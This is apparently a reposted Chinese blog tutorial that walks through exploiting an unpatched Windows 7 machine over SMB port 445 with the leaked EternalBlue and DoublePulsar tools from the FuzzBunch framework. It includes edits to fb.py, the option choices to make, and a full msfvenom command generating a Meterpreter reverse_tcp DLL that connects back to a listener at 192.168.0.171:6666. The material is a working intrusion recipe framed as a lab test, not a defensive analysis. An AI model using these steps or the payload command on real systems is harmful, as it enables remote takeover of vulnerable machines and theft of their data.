作者:边界安全 原文链接
测试环境:
靶机:windows7 64位旗舰版 445 open
攻击环境:
下载 EQGRP_Lost_in_Translation,找到\windows\fb.py。
fb.py有个地方需要修改一下:
第26,27,28行注释掉
还有第72行。
打开cmd切入windows目录。执行python fb.py
按照他的要求输入[默认]参数。
然后use Eternalblue,一路回车:
注意的是在这里选择1:
一路回车就可以看到succeeded了。
接着执行use Doublepulsar。
根据实际情况选择64位还是32位。
然后进入关键步骤:
选择运行dll文件,然后输入dll文件的路径,这个dll文件我是用msf生成的。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.171 LPORT=6666 -f dll > msfx64.dll
如果是32位的就生成32位的,如果弄错了也没事,工具会利用失败,重来就可以了。
然后一路回车:
这样子就是成功了。看看msf: